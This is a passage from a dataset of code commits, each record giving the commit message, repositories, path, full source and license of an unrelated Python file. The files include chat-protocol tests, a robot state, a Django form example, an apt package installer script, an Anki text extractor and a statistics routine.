#raise cherrypy.InternalRedirect('/privacy/config')
return self.config()
@cherrypy.expose
@require()
def config(self):
return util.render_template(template='privacy_config',
title=_('Privacy Control Panel'))
| agpl-3.0 | Python |
2ed36e44c80e4b2d059c77fcda741656200f9876 | Add tests/test-muc-invitation.py [re-recorded] | community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,jku/telepathy-gabble,mlundblad/telepathy-gabble,mlundblad/telepathy-gabble,Ziemin/telepathy-gabble,mlundblad/telepathy-gabble,community-ssu/telepathy-gabble,jku/telepathy-gabble,jku/telepathy-gabble,community-ssu/telepathy-gabble,community-ssu/telepathy-gabble,Ziemin/telepathy-gabble,Ziemin/telepathy-gabble | tests/test-muc-invitation.py | tests/test-muc-invitation.py | """
Test MUC invitations.
"""
import dbus
from twisted.words.xish import domish, xpath
from gabbletest import go, make_result_iq
from servicetest import call_async, lazy, match
@match('dbus-signal', signal='StatusChanged', args=[0, 1])
def expect_connected(event, data):
# Bob has invited us to an activity.
message = domish.Element((None, 'message'))
message['from'] = 'chat@conf.localhost'
message['to'] = 'test@localhost'
x = message.addElement(('http://jabber.org/protocol/muc#user', 'x'))
invite = x.addElement((None, 'invite'))
invite['from'] = 'bob@localhost'
reason = invite.addElement((None, 'reason'))
reason.addContent('No good reason')
data['stream'].send(message)
return True
@match('dbus-signal', signal='NewChannel')
def expect_text_channel(event, data):
if event.args[1] != 'org.freedesktop.Telepathy.Channel.Type.Text':
return False
assert event.args[2] == 2 # handle type
assert event.args[3] == 1 # handle
data['room_handle'] = 1
bus = data['conn']._bus
data['text_chan'] = bus.get_object(
data['conn'].bus_name, event.args[0])
data['group_iface'] = dbus.Interface(data['text_chan'],
'org.freedesktop.Telepathy.Channel.Interface.Group')
members = data['group_iface'].GetAllMembers()[0]
local_pending = data['group_iface'].GetAllMembers()[1]
remote_pending = data['group_iface'].GetAllMembers()[2]
assert len(members) == 1
assert data['conn_iface'].InspectHandles(1, members)[0] == 'bob@localhost'
data['bob_handle'] = members[0]
assert len(local_pending) == 1
# FIXME: the username-part-is-nickname assumption
assert data['conn_iface'].InspectHandles(1, local_pending)[0] == \
'chat@conf.localhost/test'
assert len(remote_pending) == 0
data['room_self_handle'] = data['group_iface'].GetSelfHandle()
assert data['room_self_handle'] == local_pending[0]
# accept the invitation
call_async(data['test'], data['group_iface'], 'AddMembers',
[data['room_self_handle']], 'Oh, OK then')
return True
@match('dbus-signal', signal='MembersChanged')
def expect_add_myself_into_remote_pending(event, data):
assert event.args == ['', [], [data['bob_handle']], [],
[data['room_self_handle']], 0,
data['room_self_handle']]
return True
@match('dbus-return', method='AddMembers')
def expect_add_myself_success(event, data):
return True
@match('stream-presence', to='chat@conf.localhost/test')
def expect_presence(event, data):
# Send presence for own membership of room.
presence = domish.Element((None, 'presence'))
presence['from'] = 'chat@conf.localhost/test'
x = presence.addElement(('http://jabber.org/protocol/muc#user', 'x'))
item = x.addElement('item')
item['affiliation'] = 'owner'
item['role'] = 'moderator'
data['stream'].send(presence)
return True
@match('dbus-signal', signal='MembersChanged')
def expect_members_changed2(event, data):
assert event.args == ['', [data['room_self_handle']], [], [],
[], 0, 0]
# Test sending an invitation
data['alice_handle'] = data['conn_iface'].RequestHandles(1,
['alice@localhost'])[0]
call_async(data['test'], data['group_iface'], 'AddMembers',
[data['alice_handle']], 'I want to test invitations')
return True
@match('stream-message')
def expect_invitation(event, data):
message = event.stanza
if message['to'] != 'chat@conf.localhost':
return False
x = xpath.queryForNodes('/message/x', message)
assert (x is not None and len(x) == 1), repr(x)
assert x[0].uri == 'http://jabber.org/protocol/muc#user'
invites = xpath.queryForNodes('/x/invite', x[0])
assert (invites is not None and len(invites) == 1), repr(invites)
assert invites[0]['to'] == 'alice@localhost'
reasons = xpath.queryForNodes('/invite/reason', invites[0])
assert (reasons is not None and len(reasons) == 1), repr(reasons)
assert str(reasons[0]) == 'I want to test invitations'
data['conn_iface'].Disconnect()
return True
@match('dbus-signal', signal='StatusChanged', args=[2, 1])
def expect_disconnected(event, data):
return True
if __name__ == '__main__':
go()
| lgpl-2.1 | Python | |
e6501592303e2345e1262177a11f96e91f371024 | Add a state reading all about the room of a selected entity | WalkingMachine/sara_behaviors,WalkingMachine/sara_behaviors | sara_flexbe_states/src/sara_flexbe_states/Wonderland_Get_Entity_Room.py | sara_flexbe_states/src/sara_flexbe_states/Wonderland_Get_Entity_Room.py | #!/usr/bin/env python
# encoding=utf8
from flexbe_core import EventState, Logger
import json
class Wonderland_Get_Entity_Room(EventState):
'''
Read the position of a room in a json string
-- index_function function index of the
># json_text string command to read
># input_value object Input to the index function.
#< id int id of the room
#< name string name of the room
#< x1 int position of the room
#< x2 int position of the room
#< x3 int position of the room
#< x4 int position of the room
#< y1 int position of the room
#< y2 int position of the room
#< y3 int position of the room
#< y4 int position of the room
<= done return when at least one entity exist
<= no_room return when no entity have the selected name
<= error return when error reading data
'''
def __init__(self, index_function):
# See example_state.py for basic explanations.
super(Wonderland_Get_Entity_Room, self).__init__(outcomes=['done', 'no_room', 'error'],
input_keys=['json_text', 'input_value'],
output_keys=['id','name','x1','x2','x3','x4','y1','y2','y3','y4'])
self._index_function = index_function
self._index = 0
def execute(self, userdata):
# parse parameter json data
data = json.loads(userdata.json_text)
# read if there is data
if not data[self._index]:
# continue to Zero
return 'no_room'
# try to read data
if 'id' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'room_name' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x1' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x2' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x3' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'x4' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y1' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y2' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y3' not in data[self._index]['room']:
# continue to Error
return 'error'
if 'y4' not in data[self._index]['room']:
# continue to Error
return 'error'
# write return datas
userdata.id = data[self._index]['room']['id']
userdata.name = data[self._index]['room']['room_name']
userdata.x1 = data[self._index]['room']['x1']
userdata.x2 = data[self._index]['room']['x2']
userdata.x3 = data[self._index]['room']['x3']
userdata.x4 = data[self._index]['room']['x4']
userdata.y1 = data[self._index]['room']['y1']
userdata.y2 = data[self._index]['room']['y2']
userdata.y3 = data[self._index]['room']['y3']
userdata.y4 = data[self._index]['room']['y4']
print data[self._index]['room']['id']
print data[self._index]['room']['room_name']
print data[self._index]['room']['x1']
print data[self._index]['room']['x2']
print data[self._index]['room']['x3']
print data[self._index]['room']['x4']
print data[self._index]['room']['y1']
print data[self._index]['room']['y2']
print data[self._index]['room']['y3']
print data[self._index]['room']['y4']
# continue to Done
return 'done'
def on_enter(self, userdata):
if self._index_function is not None:
try:
self._index = self._index_function(userdata.input_value)
except Exception as e:
Logger.logwarn('Failed to execute index function!\n%s' % str(e)) | bsd-3-clause | Python | |
d813f07e85b070e7ad60e8d9102ff148cc4734b8 | Create index.py | datts68/maas | SourceCode/index.py | SourceCode/index.py | #
| apache-2.0 | Python | |
dab9a2a596151b6fb2127319cacf264cfa7ae4f2 | add an example | jswinarton/django-cerebral-forms | examples/example.py | examples/example.py | import django
from django.conf import settings
from cerebral import forms
settings.configure()
django.setup()
class ExampleForm(forms.Form):
first_name = forms.CharField(
fill=True, hide=False, requires=[])
last_name = forms.CharField(
fill=True, hide=False, requires=[])
email = forms.CharField(
fill=True, hide=False, requires=[])
job_title = forms.CharField(
hide=True, requires=['email'])
annual_ad_budget = forms.CharField(
hide=True, requires=['job_title'])
comments = forms.CharField(
fill=False, hide=False, requires=[])
# Data passed to the cerebellum can be from any external source
# that collects user data, such as a database or a CRM like SalesForce.
cerebellum = {
'first_name': 'Jeremy',
'last_name': 'Swinarton',
'email': 'jeremy@swinarton.com',
}
form = ExampleForm(cerebellum=cerebellum)
form.fields.keys()
# ['first_name', 'last_name', 'email', 'job_title', 'comments']
form.initial
# {'first_name': 'Jeremy', 'last_name': 'Swinarton', 'email': 'jeremy@swinarton.com'}
# Let's submit some user data to the form and validate it.
bound_form = ExampleForm({
'first_name': 'Jeremy',
'last_name': 'Swinarton',
'email': 'jeremy@swinarton.com',
'job_title': 'Web Developer',
'comments': 'Hi!',
}, cerebellum=cerebellum)
bound_form.is_valid() # True
# In this example, we've submitted and validated the form, and added its data
# back to our database. Let's create the form again with a new cerebellum.
# This time, the job_title field will be hidden, and we'll be shown the
# annual_ad_budget_field instead.
cerebellum = bound_form.data
progressive_form = ExampleForm(cerebellum=cerebellum)
progressive_form.fields.keys()
# ['first_name', 'last_name', 'email', 'annual_ad_budget', 'comments']
progressive_form.initial
# {'first_name': 'Jeremy', 'last_name': 'Swinarton', 'email': 'jeremy@swinarton.com'}
| mit | Python | |
21bee0c5b92d03a4803baf237c460223308ebb9f | Add a fake source code so you can embed it in the example | MetaPlot/MetaPlot | examples/fakecode.py | examples/fakecode.py | # Get the hash
# 01/07/2017
# Melissa Hoffman
# Get the current repo
import os
import subprocess
testdir='/Users/melissahoffman1/'
repo = testdir
# Check if the repo is a git repo and get githash
def get_git_hash(path):
os.chdir(path)
try:
sha = subprocess.check_output(['git','rev-parse','HEAD'],shell=False).strip()
except subprocess.CalledProcessError as e:
print("ERROR, not a git repository")
return {}
return sha
githash = get_git_hash(repo)
#print(githash)
k = githash
#print(type(k))
v = 'git hash'
#print {k:v}
| mit | Python | |
077170874e3a08825e00f2b3cba68cc8f6e987ce | Prepare v1.2.509.dev | oxc/Flexget,qk4l/Flexget,crawln45/Flexget,sean797/Flexget,tobinjt/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,oxc/Flexget,JorisDeRieck/Flexget,JorisDeRieck/Flexget,LynxyssCZ/Flexget,sean797/Flexget,poulpito/Flexget,tarzasai/Flexget,jacobmetrick/Flexget,gazpachoking/Flexget,poulpito/Flexget,dsemi/Flexget,Danfocus/Flexget,jawilson/Flexget,ianstalk/Flexget,Danfocus/Flexget,oxc/Flexget,OmgOhnoes/Flexget,jacobmetrick/Flexget,malkavi/Flexget,qvazzler/Flexget,gazpachoking/Flexget,dsemi/Flexget,OmgOhnoes/Flexget,tobinjt/Flexget,JorisDeRieck/Flexget,qk4l/Flexget,jawilson/Flexget,LynxyssCZ/Flexget,Danfocus/Flexget,tarzasai/Flexget,tobinjt/Flexget,drwyrm/Flexget,OmgOhnoes/Flexget,malkavi/Flexget,poulpito/Flexget,qvazzler/Flexget,crawln45/Flexget,dsemi/Flexget,ianstalk/Flexget,LynxyssCZ/Flexget,jawilson/Flexget,malkavi/Flexget,drwyrm/Flexget,drwyrm/Flexget,Flexget/Flexget,Danfocus/Flexget,Flexget/Flexget,ianstalk/Flexget,jacobmetrick/Flexget,qvazzler/Flexget,jawilson/Flexget,sean797/Flexget,tobinjt/Flexget,Flexget/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,crawln45/Flexget,Flexget/Flexget,crawln45/Flexget,tarzasai/Flexget | flexget/_version.py | flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.509.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.508'
| mit | Python |
210f9c6acefdf2f51d33baa1ed7a2c131729fb93 | Update migrations to use lms.yml in the help text | stvstnfrd/edx-platform,eduNEXT/edx-platform,angelapper/edx-platform,angelapper/edx-platform,EDUlib/edx-platform,eduNEXT/edx-platform,arbrandes/edx-platform,edx/edx-platform,arbrandes/edx-platform,eduNEXT/edx-platform,arbrandes/edx-platform,stvstnfrd/edx-platform,eduNEXT/edunext-platform,angelapper/edx-platform,EDUlib/edx-platform,arbrandes/edx-platform,angelapper/edx-platform,stvstnfrd/edx-platform,EDUlib/edx-platform,eduNEXT/edunext-platform,eduNEXT/edunext-platform,eduNEXT/edunext-platform,EDUlib/edx-platform,edx/edx-platform,edx/edx-platform,edx/edx-platform,stvstnfrd/edx-platform,eduNEXT/edx-platform | common/djangoapps/third_party_auth/migrations/0004_auto_20200919_0955.py | common/djangoapps/third_party_auth/migrations/0004_auto_20200919_0955.py | # Generated by Django 2.2.16 on 2020-09-19 09:55
from django.db import migrations, models
import openedx.core.lib.hash_utils
class Migration(migrations.Migration):
dependencies = [
('third_party_auth', '0003_samlconfiguration_is_public'),
]
operations = [
migrations.AlterField(
model_name='ltiproviderconfig',
name='lti_consumer_secret',
field=models.CharField(blank=True, default=openedx.core.lib.hash_utils.create_hash256, help_text='The shared secret that the LTI Tool Consumer will use to authenticate requests. Only this edX instance and this tool consumer instance should know this value. For increased security, you can avoid storing this in your database by leaving this field blank and setting SOCIAL_AUTH_LTI_CONSUMER_SECRETS = {"consumer key": "secret", ...} in your instance\'s Django setttigs (or lms.yml)', max_length=255),
),
migrations.AlterField(
model_name='oauth2providerconfig',
name='secret',
field=models.TextField(blank=True, help_text='For increased security, you can avoid storing this in your database by leaving this field blank and setting SOCIAL_AUTH_OAUTH_SECRETS = {"(backend name)": "secret", ...} in your instance\'s Django settings (or lms.yml)', verbose_name='Client Secret'),
),
migrations.AlterField(
model_name='samlconfiguration',
name='private_key',
field=models.TextField(blank=True, help_text='To generate a key pair as two files, run "openssl req -new -x509 -days 3652 -nodes -out saml.crt -keyout saml.key". Paste the contents of saml.key here. For increased security, you can avoid storing this in your database by leaving this field blank and setting it via the SOCIAL_AUTH_SAML_SP_PRIVATE_KEY setting in your instance\'s Django settings (or lms.yml).'),
),
migrations.AlterField(
model_name='samlconfiguration',
name='public_key',
field=models.TextField(blank=True, help_text="Public key certificate. For increased security, you can avoid storing this in your database by leaving this field blank and setting it via the SOCIAL_AUTH_SAML_SP_PUBLIC_CERT setting in your instance's Django settings (or lms.yml)."),
),
]
| agpl-3.0 | Python | |
dc042aea1bb977984fb69a1da9c958f855d479ea | add util plot of precip cells | akrherz/idep,akrherz/dep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep,akrherz/idep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep | scripts/cligen/map_clifile_points.py | scripts/cligen/map_clifile_points.py | """Create a map of where we have climate files!"""
import psycopg2
import numpy as np
import os
import glob
from pyiem.plot import MapPlot
def get_domain():
pgconn = psycopg2.connect(database='idep', host='iemdb', user='nobody')
cursor = pgconn.cursor()
cursor.execute("""with ext as (
SELECT ST_Extent(ST_Transform(geom, 4326)) as e from huc12
WHERE scenario = 0)
SELECT st_xmin(ext.e), st_xmax(ext.e), st_ymin(ext.e), st_ymax(ext.e)
from ext""")
return np.array(cursor.fetchone())
def make_grid(extent):
x100 = [int(x) for x in (extent * 100.)]
nx = x100[1] - x100[0]
ny = x100[3] - x100[2]
return np.zeros((ny, nx))
def update_grid(extent, grid):
os.chdir("/i/0/cli")
for mydir in glob.glob("*"):
os.chdir(mydir)
for fn in glob.glob("*.cli"):
tokens = fn[:-4].split("x")
lon = 0 - float(tokens[0])
lat = float(tokens[1])
x = int((lon - extent[0]) * 100)
y = int((lat - extent[2]) * 100)
grid[y, x] = 1
os.chdir("..")
def draw_map(extent, grid):
a = np.sum(grid)
shp = grid.shape
b = shp[0] * shp[1]
c = float(a) / float(b) * 100.
m = MapPlot(sector='custom',
west=extent[0], east=extent[1], south=extent[2],
north=extent[3],
title='2 August 2016 :: DEP Precip Cells',
subtitle=('%.0f / %.0f %.2f%% Cells Currently Processed'
) % (a, b, c))
xaxis = extent[0] + np.arange(shp[1] + 1) * 0.01
yaxis = extent[2] + np.arange(shp[0] + 1) * 0.01
lons, lats = np.meshgrid(xaxis, yaxis)
m.pcolormesh(lons, lats, grid, [0, 1, 2])
m.postprocess(filename='/tmp/map_clipoints.png')
m.close()
def main():
extent = get_domain()
grid = make_grid(extent)
update_grid(extent, grid)
draw_map(extent, grid)
if __name__ == '__main__':
main()
| mit | Python | |
68d3107c9b7e71c185b2f0b926af0057d96cdc5a | add script that gives invalid output and writes stderr | AlanCoding/Ansible-inventory-file-examples,AlanCoding/Ansible-inventory-file-examples | scripts/empty/invalid_plus_stderr.py | scripts/empty/invalid_plus_stderr.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
# Write to standard error
print('TEST', file=sys.stderr)
print('{"_meta": {"hostvars": {}}') | mit | Python | |
52ae438ada955209e14c9c86ba56e3c81347930e | Make p-value calculations more numpythonic | corburn/scikit-bio,Kleptobismol/scikit-bio,jdrudolph/scikit-bio,demis001/scikit-bio,jairideout/scikit-bio,gregcaporaso/scikit-bio,averagehat/scikit-bio,kdmurray91/scikit-bio,colinbrislawn/scikit-bio,gregcaporaso/scikit-bio,jdrudolph/scikit-bio,wdwvt1/scikit-bio,Achuth17/scikit-bio,Kleptobismol/scikit-bio,anderspitman/scikit-bio,johnchase/scikit-bio,jensreeder/scikit-bio,Achuth17/scikit-bio,SamStudio8/scikit-bio,wdwvt1/scikit-bio,Kleptobismol/scikit-bio,kdmurray91/scikit-bio,SamStudio8/scikit-bio,jairideout/scikit-bio,johnchase/scikit-bio,averagehat/scikit-bio,colinbrislawn/scikit-bio,jensreeder/scikit-bio,demis001/scikit-bio,anderspitman/scikit-bio,xguse/scikit-bio,corburn/scikit-bio,xguse/scikit-bio | skbio/math/stats/distance/_mantel.py | skbio/math/stats/distance/_mantel.py | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import pearsonr, spearmanr
from skbio.core.distance import DistanceMatrix
def mantel(x, y, method='pearson', permutations=999, alternative='twosided'):
if method == 'pearson':
corr_func = pearsonr
elif method == 'spearman':
corr_func = spearmanr
else:
raise ValueError("Invalid correlation method '%s'." % method)
if permutations < 0:
raise ValueError("Number of permutations must be greater than or "
"equal to zero.")
if alternative not in ('twosided', 'greater', 'less'):
raise ValueError("Invalid alternative hypothesis '%s'." % alternative)
x = DistanceMatrix(x)
y = DistanceMatrix(y)
# TODO: test size >= 3
if x.shape != y.shape:
raise ValueError("Distance matrices must have the same shape.")
x_flat = x.condensed_form()
y_flat = y.condensed_form()
orig_stat = corr_func(x_flat, y_flat)[0]
if permutations == 0:
p_value = np.nan
else:
perm_gen = (corr_func(x.permute(), y_flat)[0]
for _ in range(permutations))
permuted_stats = np.fromiter(perm_gen, np.float, count=permutations)
if alternative == 'twosided':
count_better = (np.absolute(permuted_stats) >=
np.absolute(orig_stat)).sum()
elif alternative == 'greater':
count_better = (permuted_stats >= orig_stat).sum()
else:
count_better = (permuted_stats <= orig_stat).sum()
p_value = (count_better + 1) / (permutations + 1)
return orig_stat, p_value
| # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import pearsonr, spearmanr
from skbio.core.distance import DistanceMatrix
def mantel(x, y, method='pearson', permutations=999, alternative='twosided'):
if method == 'pearson':
corr_func = pearsonr
elif method == 'spearman':
corr_func = spearmanr
else:
raise ValueError("Invalid correlation method '%s'." % method)
if permutations < 0:
raise ValueError("Number of permutations must be greater than or "
"equal to zero.")
if alternative not in ('twosided', 'greater', 'less'):
raise ValueError("Invalid alternative hypothesis '%s'." % alternative)
x = DistanceMatrix(x)
y = DistanceMatrix(y)
# TODO: test size >= 3
if x.shape != y.shape:
raise ValueError("Distance matrices must have the same shape.")
x_flat = x.condensed_form()
y_flat = y.condensed_form()
orig_stat = corr_func(x_flat, y_flat)[0]
if permutations == 0:
p_value = np.nan
else:
better = 0
for i in range(permutations):
r = corr_func(x.permute(), y_flat)[0]
if alternative == 'twosided':
if abs(r) >= abs(orig_stat):
better += 1
else:
if ((alternative == 'greater' and r >= orig_stat) or
(alternative == 'less' and r <= orig_stat)):
better += 1
p_value = (better + 1) / (permutations + 1)
return orig_stat, p_value
| bsd-3-clause | Python |
504a5390a78811393e011f01e5b6ddf2a3aae8e8 | Create ubuntu-monolith.py | hatchery/Genepool2,hatchery/genepool | ubuntu-monolith.py | ubuntu-monolith.py | #!/usr/bin/env python
import subprocess
import os
def apt_install(packages):
env = os.environ.copy()
env[DEBIAN_FRONTEND] = "noninteractive"
subprocess.call('sudo -E apt-get update')
subprocess.call('sudo -E apt-get install -y ' + ' '.join(packages))
packages = """
- ack-grep
- ant
- atop
- bastet
- binclock
- boxes
- bsdgames
- build-essential
- byobu
- bzr
- bzr-git
- calcurse
- cloc
- cowsay
- chromium-browser
- dict
- dstat
- dtach
- duplicity
- emacs
- figlet
- findutils
- fortune
- gcc
- gdb
- gist
- glances
- golang
- gradle
- greed
- htop
- irssi
- jq
- ledger
- less
- lua5.2
- maven
- maven2
- mc
- mdm
- mercurial
- mercurial-git
- moon-buggy
- mosh
- most
- mtr
- multitail
- nethack-console
- nethogs
- netpipes
- ninvaders
- octave
- parallel
- python-software-properties
- qemu
- qemu-kvm
- qalc
- r-base
- ranger
- rbenv
- remind
- ruby
- screen
- siege
- silversearcher-ag
- sl
- slashem
- socat
- squid3
- steghide
- stegsnow
- subversion
- sudo
- sysstat
- task
- toilet
- tpp
- tmux
- tsung
- ttyrec
- vifm
- vim
- vim-gtk
- weechat
- wyrd
- zsh
""".split("\n- ")
apt_install(packages)
| mit | Python | |
96c873da602bf34fb129b3d86378e729d7d94d72 | Create BoofCv.py | MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab | home/Mats/BoofCv.py | home/Mats/BoofCv.py | boof = Runtime.createAndStart("boof","BoofCv")
args = ["Test"]
boof.main(args)
| apache-2.0 | Python | |
fcfb2b768f07bab8c94d83d9d53d70263d078b75 | Create MAP_loader.py | openEduConnect/eduextractor | eduextractor/MAP_loader.py | eduextractor/MAP_loader.py | import requests
import pandas as pd
from zipfile import ZipFile
from StringIO import StringIO
from nweaconfig import NWEA_USERNAME, NWEA_PASSWORD
## import database configuration from parent directory
## config contains SQLalchemy engine and a few DB functions
import sys
sys.path.append('../config')
import databaseconfig
## send a GET request to the API endpoint
print 'Connecting to NWEA...'
cdf_url = 'https://api.mapnwea.org/services/reporting/dex'
r = requests.get(cdf_url, auth=(NWEA_USERNAME,NWEA_PASSWORD))
print r.reason
## if the request is successful...
if r.status_code == 200:
print 'Downloading CDF...'
## convert the response content into a zipfile
z = ZipFile(StringIO(r.content))
zfiles = z.namelist()
## create database engine and open a connection
print 'Connecting to database...'
engine = databaseconfig.DB_ENGINE
conn = engine.connect()
for i, f in enumerate(zfiles):
print 'Extracting', f
## open/extract file from zip
cdf = z.open(f)
## read into dataframe
df = pd.read_csv(cdf)
## define the table name
tablename = 'AUTOLOAD$NWEA_' + f.strip('.csv')
## load it!
if len(df) > 0:
print 'Loading %s records into database...' % (len(df))
## truncate
databaseconfig.truncate_table(conn, tablename)
## "append" to the truncated destination table
df.to_sql(tablename, engine, if_exists='append', index_label='BINI_ID')
conn.close()
print 'Done!'
| mit | Python | |
feb7dbeeb055696bf6646dba0bf3bb224d70b283 | Add separate text manipulation class | luoliyan/incremental-reading-for-anki,luoliyan/incremental-reading-for-anki | ir/text.py | ir/text.py | from collections import defaultdict
from anki.notes import Note
from aqt import mw
from aqt.addcards import AddCards
from aqt.editcurrent import EditCurrent
from aqt.utils import showInfo, tooltip
from .util import fixImages, getField, getInput, setField
class TextManager:
def __init__(self, settings):
self.history = defaultdict(list)
self.settings = settings
def highlight(self, bgColor=None, textColor=None):
if not bgColor:
bgColor = self.settings['highlightBgColor']
if not textColor:
textColor = self.settings['highlightTextColor']
script = "highlight('%s', '%s');" % (bgColor, textColor)
mw.web.eval(script)
self.save()
def extract(self):
if not mw.web.selectedText():
showInfo('Please select some text to extract.')
return
if self.settings['plainText']:
mw.web.evalWithCallback('getPlainText()', self.create)
else:
mw.web.evalWithCallback('getHtmlText()', self.create)
def create(self, text):
self.highlight(self.settings['extractBgColor'],
self.settings['extractTextColor'])
currentCard = mw.reviewer.card
currentNote = currentCard.note()
model = mw.col.models.byName(self.settings['modelName'])
newNote = Note(mw.col, model)
newNote.tags = currentNote.tags
setField(newNote, self.settings['textField'], fixImages(text))
setField(newNote,
self.settings['sourceField'],
getField(currentNote, self.settings['sourceField']))
if self.settings['editSource']:
EditCurrent(mw)
if self.settings['extractDeck']:
did = mw.col.decks.byName(self.settings['extractDeck'])['id']
else:
did = currentCard.did
if self.settings['editExtract']:
addCards = AddCards(mw)
addCards.editor.setNote(newNote)
deckName = mw.col.decks.get(did)['name']
addCards.deckChooser.deck.setText(deckName)
addCards.modelChooser.models.setText(self.settings['modelName'])
else:
title = getInput('Extract Text', 'Title')
setField(newNote, self.settings['titleField'], title)
newNote.model()['did'] = did
mw.col.addNote(newNote)
def remove(self):
mw.web.eval('removeText()')
self.save()
def undo(self):
note = mw.reviewer.card.note()
if note.id not in self.history or not self.history[note.id]:
showInfo('No undo history for this note.')
return
note['Text'] = self.history[note.id].pop()
note.flush()
mw.reset()
tooltip('Undone.')
def save(self):
def callback(text):
if text:
note = mw.reviewer.card.note()
self.history[note.id].append(note['Text'])
note['Text'] = text
note.flush()
mw.web.evalWithCallback(
'document.getElementsByClassName("ir-text")[0].innerHTML;',
callback)
| isc | Python | |
b044ba312b126cb17bf906b1984e7b407509fcc6 | Add script to assist in packaging. | davidalber/Geneagrapher,davidalber/Geneagrapher | Geneagrapher/makedist.py | Geneagrapher/makedist.py | """This tool sets up a distribution of the software by automating
several tasks that need to be done.
The directory should be in pristine condition when this is run (i.e.,
devoid of files that need to be removed before packaging begins). It
is best to run this on a fresh check out of the repository."""
import os
import licensify
if __name__ == '__main__':
# "Licensify" the source files.
files = ['geneagrapher/GGraph.py', 'geneagrapher/geneagrapher.py',
'geneagrapher/grab.py', 'geneagrapher/ggrapher.py']
license = 'COPYING'
for file in files:
res = licensify.prependLicense(file, license)
fout = open(file, "w")
fout.write(res)
fout.close()
# Remove files (including this one) that are not to be in the
# distribution.
os.system('svn rm licensify.py')
os.system('rm -f licensify.pyc')
os.system('svn rm makedist.py')
os.system('rm -f makedist.pyc')
# Make the distribution.
os.system('python setup.py sdist --format gztar,zip')
# Compute digests and signatures.
os.chdir('dist')
dirl = os.listdir('.')
for file in dirl:
comm = 'sha1sum %s > %s.sha1' % (file, file)
os.system(comm)
comm = 'gpg -abs %s' % (file)
os.system(comm)
os.chdir('..')
# Add files to repository.
os.system('svn add Geneagrapher.egg-info')
os.system('svn add dist')
| mit | Python | |
410b354cb0e72ba741439a337aba4ef4c3cda8b1 | Add existing python file for performing a very crude analysis on a set of lsl files (as taken from an untarred OAR, for example) | justinccdev/opensimulator-tools,justinccdev/opensimulator-tools,justinccdev/opensimulator-tools,justinccdev/opensimulator-tools | src/ossa.py | src/ossa.py | #!/usr/bin/python
import re
import sys
""" Taken from http://stackoverflow.com/questions/2669059/how-to-sort-alpha-numeric-set-in-python"""
def sorted_nicely(l):
""" Sort the given iterable in the way that humans expect."""
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(l, key = alphanum_key)
print "Hello World"
# Usage
if len(sys.argv) == 1:
print "Usage: %s <path>+" % sys.argv[0]
sys.exit(-1)
functionsFound = set()
filenames = sys.argv[1:]
for filename in filenames:
lsl = file(filename).readlines()
scriptFuncRe = re.compile("\s+((?:(?:ll)|(?:os)|(?:mod)|(?:Json)|(?:ls))\w+)\(");
for line in lsl:
# print "Analyzing %s" % line
match = scriptFuncRe.search(line)
if match != None:
# print "Found match %s: %s" % (fn, match.group(1))
functionsFound.add(match.group(1))
for fn in sorted_nicely(functionsFound):
print "Found %s" % fn
print "%s functions used" % len(functionsFound)
print "Fin"
| bsd-3-clause | Python | |
252ab143b139e39a1ef87150d8008704107fe1d8 | Create Database.py | albertcuesta/PEACHESTORE | database/Database.py | database/Database.py | __author__ = 'albert cuesta'
import os.path
class database:
def listaraplicaiones(self):
result = []
with open("database/data/aplicaciones.txt", mode='r+', encoding='utf-8') as file:
resultado = file.read()
texto = resultado.split("\n")
for linea in texto:
result.append(linea.split(","))
return result
def listaraplicacionespago(self):
aplicaciones=[]
fo = open("database/data/aplicacionesPago.txt", mode='r', encoding='utf-8')
for line in fo:
return line
fo.close()
def añadiraplicacionpago(self, nombre, proveedor, fecha, precio, descargas,puntuacion,comentarios):
aplicacion = []
with open("database/data/aplicacionesPago.txt", mode='a',encoding='utf-8')as archivo1:
archivo1.write(nombre+","+proveedor+","+fecha+","+precio+","+descargas+","+puntuacion+","+comentarios+"\n")
print ("app insertada")
def añadiraplicacionfree(self, nombre, proveedor, fecha, precio, descargas,puntuacion,comentarios):
aplicacion = []
with open("database/data/aplicaciones.txt", mode='a',encoding='utf-8')as archivo:
archivo.write(nombre+","+proveedor+","+fecha+","+precio+","+descargas+","+puntuacion+","+comentarios+"\n")
print ("app insertada")
def sumarDescarga(self, nombre, pathToDb="database/data/aplicaciones.txt"):
if os.path.isfile('database/data/aplicaciones.txt'):
file = open(pathToDb, 'r')
llista = file.readlines()
file.close()
trobat = False
with open(pathToDb, 'w') as file:
for linia in llista:
if linia.split(";")[0] != nombre:
file.write(linia)
else:
linia1 = linia.split(";")
